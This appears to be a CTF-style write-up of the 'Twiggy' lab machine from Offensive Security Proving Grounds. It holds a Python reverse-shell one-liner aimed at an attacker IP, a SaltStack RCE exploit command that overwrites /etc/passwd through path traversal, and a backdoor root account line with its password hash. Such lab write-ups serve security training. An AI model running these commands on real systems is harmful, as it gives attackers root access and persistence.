👨‍💻
Pentesting
HomePlaygroundCTFsBuy Me a Flag 🚩
  • Zeyu's OSCP Writeups
  • Home
  • CTF Writeups
  • Playground
  • Blog Posts
    • My OSCP Journey: How I Tried Harder
  • Proving Grounds
    • Warm Up
      • Pebbles
      • Twiggy
      • Bratarina
      • Internal
      • ClamAV
    • Get to Work
      • Nibbles
      • Nickel
      • WebCal
      • Authby
      • Pelican
      • Jacko
      • Medjed
      • XposedAPI
    • Try Harder
      • Meathead
  • Hack the Box
    • Easy
      • ScriptKiddie
      • Delivery
      • Laboratory
      • Academy
      • Sense
    • Medium
      • Cronos
      • Jeeves
Powered by GitBook
On this page
  • Information Gathering
  • Service Enumeration
  • Port 80
  • Port 8000
  • Exploitation

Was this helpful?

  1. Proving Grounds
  2. Warm Up

Twiggy

Writeup for Twiggy from Offensive Security Proving Grounds (PG)

PreviousPebblesNextBratarina

Last updated 3 years ago

Was this helpful?

Information Gathering

Service Enumeration

nmapAutomator.sh -H 192.168.134.62 -t full

nmapAutomator.sh -H 192.168.134.62 -t vulns

Port 80

Mezzanine is running.

Port 8000

The SaltStack Salt REST API is running.

Exploitation

SaltStack < 3000.2, < 2019.2.4, 2017.*, 2018.* is vulnerable to an RCE vulnerability.

We can try to execute a reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.134",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

However, this does not work (presumably because of the firewall).

We can, however, read arbitrary files, including passwd and shadow.

We can also write arbitrary files. To add our own root user to /etc/passwd:

echo "root2:bWBoOyE1sFaiQ:0:0:root:/root:/bin/bash" >> passwd

Note that this hash corresponds to our custom password, mypass.

$ openssl passwd mypass                                                    
bWBoOyE1sFaiQ

Upload the modified file: python3 48421.py --master 192.168.134.62 --upload-src passwd --upload-dest ../../../../../etc/passwd

Check that our user was correctly added:

Now, using the root:mypass credentials, we can SSH into the server as root. This works because password authentication is enabled.

Exploit from:

https://www.exploit-db.com/exploits/48421